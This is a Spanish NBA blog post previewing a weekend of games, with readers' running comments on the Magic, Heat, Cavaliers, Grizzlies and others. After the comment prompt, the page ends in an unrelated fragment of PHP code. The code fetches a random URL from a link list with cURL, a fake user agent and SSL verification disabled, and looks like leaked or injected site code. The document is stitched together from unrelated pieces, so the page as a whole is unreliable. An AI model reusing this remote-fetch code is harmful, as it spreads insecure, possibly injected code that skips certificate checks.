Previa fin de semana: Grizzlies, Raptors y Warriors en dos derrotas

21 de November de 2014 por TheDeerHunter

Noche de viernes donde prácticamente juega todo dios. 12 partidos nada menos.

Como viene siendo costumbre en TJNBA comenzaremos siguiendo a los Magic, que visitan Charlotte.  Al mismo tiempo los Suns tratarán de endosarle la 12ª a Sixers.

Uno de los platos fuertes del día viene justo después (1:30AM) cuando los Raptors, líderes del Este, reciben a los Bucks, una de las sensaciones de la conferencia. Al mismo tiempo que un Pistons@Hawks que en otra época hubiera sido la leche.

Con media hora de demora comenzarán algunos choques marcados por las lesiones. Veremos quién se presenta por los Grizzlies, que reciben a Celtics; sabemos que los Wolves pierden también a Kevin Martin una temporada, además de esta noche frente a los campeones; conocidas son también las bajas de Thunder frente a Nets, pero ojo porque a esa hora también tenemos un partidazo en el Cavs@Wizards. Difícil papeleta para LeBron y los suyos.

En horario de machotes nos quedará el Pelicans@Nuggets, el Jazz@Warriors y un Bulls@Blazers que según quién esté disponible será más o menos pasote de partido. Antes de esto, cómo podía olvidarme, un Lakers@Mavs donde los amarillos “oh my godness” podrían firmar su tercera victoria consecutiva.

El sábado se cortan un poco y en el menú “tan sólo” tendremos 9 partidos y casi todos los implicados en back to back. Comenzaremos con el Suns@Pacers con los de Indianapolis metidos en zona playoffs a pesar de tanta baja. También Heat@Magic. Después pasaremos a un excelente Cavs@Raptors y los Sixers visitarán el Madison para dirimir quién son los más malos de la conferencia.

A partir de las 2AM un muy interesante Mavs@Rockets y el Kings@Wolves. Después un Wizards@Bucks, Nets@Spurs y, para terminar el Pelicans@Jazz.

Por último domingo light con 5 partidos. Clippers@Grizzlies, Blazers@Celtics y Hornets@Heat todos a las 12AM más Warriors@Thunder y Nuggets@Lakers en horas altamente intempestivas para amanecer el lunes. Este fin de semana nos dejan sin partido a hora prudencial.

Que ustedes lo pasen bien.

Comenta

30 comentarios a esta entrada

  1. Nacho dice:
    #1

    Denise… tus chicos (Frye y Ridnour al frente, jejeje) están ahí en el primer cuarto. Son buenos, tienen cosas que enganchan, pero los veo un poco soft. Pero cuidado, que juegan. Para ganarles hay que ponerse en modo PO (un poco al menos), porque a talento sin oposición les ganan pocos. Como cojan victorias igual se lo creen y ellos son los que ponen rodillo (no los veo así, sin embargo). He visto poco a los Bucks, pero tienen más empaque.
    Por otro lado Charlotte debería empezar a pisar más el acelerador en defensa, prometían mucho, y empiezan a alejarse de los PO. esta noche no pueden fallar.

      Citar

  2. Nacho dice:
    #2

    Leches, estoy por pasarme al PHI-PHO. La que está liando Thomas en un momento, 6 min. 14 puntos sin fallo

      Citar

  3. Nacho dice:
    #3

    Bueno, pues los hornets han parado un intento de rebeldía protagonizado por Fournier. Interesante planteamiento del denostado Vaughn. Oladipo, Ridnour y Fournier en pista, y el francés sacando al defensor más alto a la línea de tres y penetrando. 4 puntos seguido y un pick’n’pop mal ejecutado por Vucevic

      Citar

  4. Nacho dice:
    #4

    Se van once abajo los de Orlando, sujetados solo por La sota de Oros y Oladipo, Vucevic en 8 puntos pero fallón de más, y Harris 10 rebotes, pero horrible en el tiro y peor en el concepto del juego.
    Jefferson a lo suyo, sumando y disfrutando del Spa que es la zona de los de Florida.

      Citar

  5. Nacho dice:
    #5

    Phoenix empezó dubitativo y se va al descanso ganando de paliza. Lo de Thomas de escándalo (flipará quien lo tenga en la Fantasy, en 12 minutos ha producido lo que muchos quisieran en una semana)
    Momento LeBron, divertido, me quedo en los Cavs, y contaré si no me duermo, jeje

      Citar

  6. Nacho dice:
    #6

    A 9:32 para el descanso
    Pues empiezan a irse los Wizards, y LeBron, después de cascarse todo el cuarto, lo ve mal desde el banquillo. Le queda a este equipo para hacerse.
    Por los capitalinos, bien, ya han anotado 8 jugadores,

      Citar

  7. Nacho dice:
    #7

    Golpe de Varejao, no puedo hacer valoración temprana (esa que se me da bien) porque me salió la publi en ese momento. Juego parado, LeBron preocupado

      Citar

  8. Nacho dice:
    #8

    Varejao en pista

      Citar

  9. Nacho dice:
    #9

    Que importante lo que aporta a un equipo Paul Pierce. E un minuto provoca dos faltas de ataque y entremedias se casca un triple.
    Wizards 10 arriba a 2:15 para el descanso. 26-0 a favor de los capitalinos en puntos desde el banquillo.

      Citar

  10. Nacho dice:
    #10

    Wizards de trece al descanso. Seraphin haciendo buenos a los que lo pillamos para la Fantasy.
    Por los Cav’s… ¿adivinamos? Un par de triples de Love, en la linea de libres Irving y LeBron, un poco más fallón que habitualmente.
    Ufff, lo que les queda a estos Cavaliers…

      Citar

  11. Nacho dice:
    #11

    Y vuelvo a mis inicios, Orlando a 1.30 se pone por delante… guau

      Citar

  12. Nacho dice:
    #12

    Nacho:
    Se van once abajo los de Orlando, sujetados solo por La sota de Oros y Oladipo, Vucevic en 8 puntos pero fallón de más, y Harris 10 rebotes, pero horrible en el tiro y peor en el concepto del juego.
    Jefferson a lo suyo, sumando y disfrutando del Spa que es la zona de los de Florida.

    Perdón por la autocita, pero…
    La segunda parte ha tenido que ser un cromo totalmente diferente. Fournier se fue a los 21 puntos. Harris y Vucevic algo han mejorado, aunque un 11 de 33 en TC entre los dos. Eso sí, 26 rebotes.
    Pero han sido Payton, Green y Gordon los que han dado la vuelta al partido, y el señor Vaughn los ha mantenido en la cancha, han ganado, y el resto del equipo una piña en el banquillo. Hoy Denise, toca decir ‘chapeau’ al entrenador.
    No me gustan los Hornets.

      Citar

  13. Nacho dice:
    #13

    Fin del tercer cuarto en Whasington. Los Wizards 15 arriba.
    Ojito al partido de Wall, de MVP de largo (la otra exhibición es de Parker, pero dado el rival no creo que juegue en el último cuarto)
    Esto supongo que lo ganarán los de rojo, yo me voy a sopar, que me habéis dejado solo.
    Qué banda los Cav’s, están aún ahí porque los tíos son muy buenos, pero el equipo… Blatt ¡ay! Blatt

      Citar

  14. Denise dice:
    #14

    Nacho: Perdón por la autocita, pero…
    La segunda parte ha tenido que ser un cromo totalmente diferente. Fournier se fue a los 21 puntos. Harris y Vucevic algo han mejorado, aunque un 11 de 33 en TC entre los dos. Eso sí, 26 rebotes.
    Pero han sido Payton, Green y Gordon los que han dado la vuelta al partido, y el señor Vaughn los ha mantenido en la cancha, han ganado, y el resto del equipo una piña en el banquillo. Hoy Denise, toca decir ‘chapeau’ al entrenador.
    No me gustan los Hornets.

    Si, 58-30 para Orlando ha sido el resultado en los últimos 18 minutos, con especial atención al último cuarto, 41-21 con 15/21 en TC para los Magic. Muy mal los Hornets, ya dije hace días que su coach creo que sería el primero en caer (aunque estando por ahí Saunders, nunca se sabe). Como digo, dominaban 70-47 a mediados del tercer cuarto, y a partir de ahí les entra una pajara en defensa monumental, con Kemba flotando sangrantemente a Payton, vale que el chaval es medio manco, pero hasta yo habría metido alguna con esa defensa.
    Hoy Vaughn no ha estado mal, dandole afortunadamente solo 6 minutos a Ridnour, que es lo que debería jugar siempre. Y Frye tampoco ha jugado una minutada a pesar de las bajas de Aaron Gordon y O’quinn.
    Hablando de Aaron Gordon, se operó el quinto metatarsiano del pie izquierdo y se espera que ya no vuelva hasta principios de 2015.

    Y la temporada de Tobias es sensacional, pena de no haber podido alcanzar con él un acuerdo de renovación tal y como se hizo con Vucevic, le va a salir por un buen pico a los Magic este verano si quieren retenerle. Y después La Sota de Oro jugando muy por encima de las expectativas. El que no está haciendo mucho es Oladipo, bastante desafortunado en el tiro y en la dirección del equipo en los pocos partidos que ha jugado, parece como si este juego coral con más pases y circulación de balón no pegase bien con su juego, que es más de me pongo en la cabeza de la bombilla, sobo la bola un rato y después penetro.

    Pobrecillos los OKC la de partidos que están perdiendo en los últimos segundos, dentro de lo malo, no obstante creo que les puede venir bien cuando vuelvan KD y RW, ya que se van a encontrar a gente como Telfair, Morrow ó Lance Thomas de los cuales no se esperaba nada, y han demostrado ser utiles aún.

      Citar

  15. Ruxixon dice:
    #15

    Ese Nacho,vamos a tener que hacer una colecta y te mandamos a pie de pista,jeje.

    Yo me he tragado tres cuartos del Bucks@Raptors y corté ya en el último porque con 44 puntos de ventaja poco había que rascar.Buena lección para la defensa de los Bucks,no creo que haya que darles duro,son chavales jóvenes y están rindiendo por encima de las expectativas y de todo se aprende,incluso de palizas como las de esta noche.Los Raptors qué decir,si fuera esto el NBA 2k,cualquiera diría que jugaban con 100 en asistencia en el tiro,metieron de todos los colores y si encima siguen en la tónica habitual en su defensa y jugando en “The North” pues explicamos el 124-83 final.

      Citar

  16. Denise dice:
    #16

    Bueno, derbi descafeinado en Florida con las ausencias de Wade, Tobias Harris, Norris Cole y Aaron Gordon, aun así, el primer tiempo ha sido extraordinario. 49-46 para los de Miami, pero un encuentro igualadisimo donde ninguno de los 2 equipos recuerdo haberse ido por más de 5 puntos, y donde ha habido tropecientas alternancias de liderazgo en el marcador. Por Miami, me está encantado Napier, jugonazo y robazo que han pegado los sureños. Bosh sensacional sacando a Vucevic muy afuera y clavando tiros exteriores. El que no está fino es Deng por ahora.
    Por Orlando, si Bosh saca afuera a Vooch, éste se lo está merendando en la zona, 15 puntos con 6/9 en TC, bien secundado por Oladipo que está haciendo un gran choque hoy sí.

      Citar

  17. Denise dice:
    #17

    Vaya canasta de Vucevic, luchando como un jabato en la pintura de Miami, haciendo palmeos, fallando pero cogiendo su propio rebote 4 veces consecutivas. Sus TC se han visto perjudicados por esta jugada. pero sus rebotes ofensivos se han disparado. El Amway puesto en pie.

      Citar

  18. Denise dice:
    #18

    Vamos 76ers…despues de ir perdiendo casi todo el primer tiempo de 15, los 76ers han completado unos buenos minutos finales de 2º cuarto, yendose al descanso solo 7 abajo. Sería epico que ganasen su primer choque en el Madison. Tiembla Fisher!!

      Citar

  19. Denise dice:
    #19

    La de balones que está robando Payton…pero de nada sirve si le hacen falta, va a la linea, y primero se tira un casi airball y después una pedrada.
    Tremedo partido de Bosh, sacando la metralleta desde el perimetro. Creo que el Bosh de este año es el mejor que hemos visto nunca.
    A todo esto, canasta de Chalmers a 4 minutos que pone 8 arriba a los Heat. Creo que es la primera vez en todo el partido que un equipo se pone más allá de 5 arriba. El partido no puede ser más igualado.

      Citar

  20. Denise dice:
    #20

    Booooshhh vaya partido del cuello largo. Tremendo.
    Miami 11/23 en Triples, los Magic 2/14, por ahi se está decantando finalmente a pesar de la superioridad de ORL en el rebote

      Citar

  21. Denise dice:
    #21

    Denise:
    Vamos 76ers…despues de ir perdiendo casi todo el primer tiempo de 15, los 76ers han completado unos buenos minutos finales de 2º cuarto, yendose al descanso solo 7 abajo. Sería epico que ganasen su primer choque en el Madison. Tiembla Fisher!!

    Nada, parcial de 19-7 para los Knicks en 10 minutos, y los 76ers ya van 20 abajo y con otra derrota en la mochila.

      Citar

  22. Denise dice:
    #22

    96-92 para Miami a falta de 30 segundos. Sensacional Mario Chalmers en los minutos finales del partido, metiendo especialmente una bombita desequilibrado que le da medio partido a Miami.
    Vaya duelo entre 2 colosos en la pintura, de momento, 32-9 para Bosh, 33-17 para Vucevic.
    Who’s that guy called Dwight?

      Citar

  23. Denise dice:
    #23

    Ganaron los Heat eun un choque igualadisimo que se decantó en los minutos finales por unas buenas acciones casi consecutivas de Bosh, Chalmers y un triple de Shannon Brown, que hicieron a los Heat coger una ventaja de 7-9 puntos, y en un encuentro tan igualado, esto era demasiada diferencia para que los Magic pudiesen contrarrestarla.
    En terminos globales, los 12 triples con un 46% de acierto en Miami, por el pésimo 3/16 (18%) de Orlando fueron clave.

    Por los Heat,colosal partido de Bosh 32-10, 13/20 en TC y un par de triples y otras dos canastas de 2 vitales en los momentos calientes. Otro que se calentó al final fue Chalmers, 24-8 y erigiendose como la referencia exterior en ausencia de Wade y copiando sus penetraciones en buena manera. Gran primer tiempo de Napier. Y muy mal partido de Deng.

    Por los Magic, colosal Vucevic, 33-17 con 12/24 en TC y 9/11 en TL. Pero demasiado solo le han dejado sus compañeros. Me vuelve a decepcionar profundamente Oladipo, El primer tiempo ha estado bien, pero en el segundo no ha hecho nada. Lo peor es que ni lo han intentado. No sé si es la mascara, que la presencia de Fournier y Payton le impiden amasar bola y hacer sus penetraciones, que los Magic circulan más la pelota…el caso es que lo he visto con muy poca actitud y determinación en ataque. Todo lo contrario que la Sota de Oro (si, Magicjohnson lo reconozco), el tio no ha estado fino en ataque, pero lo ha intentado, ha penetrado, creado juego, asistido, ha generado ventajas, Muy bien. Otro que ha estado muy bien ha sido Payton, pero el chaval es manco. Vayas piedras en los TL!!.
    Y por último, felicito a Vaughn por no darle ni un solo segundo a Ridnour. Sigue así, hombre!. Lo malo es que ahora le ha dado por Willie Green, y este buen hombre a veces se cree Kobe Bryant y las mandarinas que se tira son de órdago. 30 minutazos y 0-5 en TC, 1 misero rebote y una puerca asistencia. En los partidos previos, habñia jugado muy bien, pero hoy ha estado nulo, y quizás era mejor haber tirado más de Ben Gordon.

      Citar

  24. Nacho dice:
    #24

    Denise, sorry, anoche no te pude acompañar, jejeje. A mi edad te pasas una noche y las niñas no tienen consideración, te siguen levantando a las 8,
    Pena lo de Orlando anoche. Sí, le falta un algo a Oladipo y otro a Payton, pero crecerán, no son Ridnour (por la edad digo)

    Viendo resúmenes,,. que mal me cae Harden, y no por él en sí, sino por la sobreprotección arbitral que tiene. Lo de la jugada decisiva si es falta, que lo puedo admitir, nunca podría ser un and one, porque los pasos son escandalosos. Aún así chapeau para unos Rockets muy sólidos. Mola ver a Papanikolau en cancha en los momentos de verdad.

    Toronto va al ritmo que los Cav’s se gripan.

    Y sí, el Este ha mejorado mucho este año, tanto que Denver (oh, my god!) sería equipo de PO allí.

      Citar

  25. Nacho dice:
    #25

    Esta noche me veré el Grizlies/Clippers, pero con un ojo en el GSW-OKC, donde necesito un “6” de Leandrinho. Puta Fantasy, jejeje

      Citar

  26. Nacho dice:
    #26

    Después del paseo que se está dando Gasol, 12p. 6/8, 3r. los Clippers solo llegan 5 abajp al fin del primer cuarto. Un Barnes de otra época al inicio, y la insistencia de Griffin los mantienen.
    Al loro con la defensa de DeAndre Jordan… si sigue así Marc acaba MVP de la jornada

      Citar

  27. Vader dice:
    #27

    No veas como esta Marc… que fenómeno.

    Por cierto que mal esta físicamente Glen Davis, encima con la camiseta con mangas aún se ve más gordo. A ver si empieza a cuidarse porque esto tiene muy mala pinta.

    Saludos

      Citar

  28. Nacho dice:
    #28

    53-40, Grizzlies al descanso.
    Marc en otra galaxia, no llega a los 16 minutos de juego y 20 p. en una serie de 8/10 (4/5 en TL) 6 reb. y un tapón.
    Momento Magic Allen en un minuto de esos antológicos.
    Todo el juego coral de los de Memphis en su mejor momento. Han anotado 10 jugadores, también ha salido Calathes, libre ya de la suspensión. En el lado ¿negativo? Randolph, que haciendo honor al jugador de equipo (sí) en que se ha convertido, ha dado el paso atrás para que se hinche su compañero.
    Muy bien Joerger, mueve el equipo sin estridencias, puede comerse Z’bo 13 minutos seguidos para que las rotaciones sigan un curso natural. Mola.

    Mal los Clippers, mal mal Paul, que se libra por hacer 4 puntos de TL en faltas recibidas en su campo, y una canasta made in casa de las de siempre, para cerrar el cuarto. Griffin desapareció en el segundo cuarto.
    El equipo sigue ahí en gran parte gracias a los 12 TL anotados, eso sí, con mal porcentaje.

      Citar

  29. Nacho dice:
    #29

    16 arriba memphis, con un 10-2 en el último minuto y medio.
    Marc sigue el clinic (con una jugada con mate con pasos escandalosos no pitados) Los últimos diez puntos de Memphis de Udrih, Pondexter y Lee.
    El arreón de los Clippers para acercarse lo dieron entre JJ Redick en plan los blancos la saben meter y, ahora sí, un magnífico Chris Paul.
    Griffin missing in action

      Citar

  30. Nacho dice:
    #30

    Pues tres triples seguidos de Lee, Udrih y Pondexter finiquitan el partido a falta de 8 minutos.
    Doc Rivers, no te reconozco. Equipo insulso.
    Hala, a dormir y esperar que Barbosa se recomponga y me haga 6 puntos para la Fantasy

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>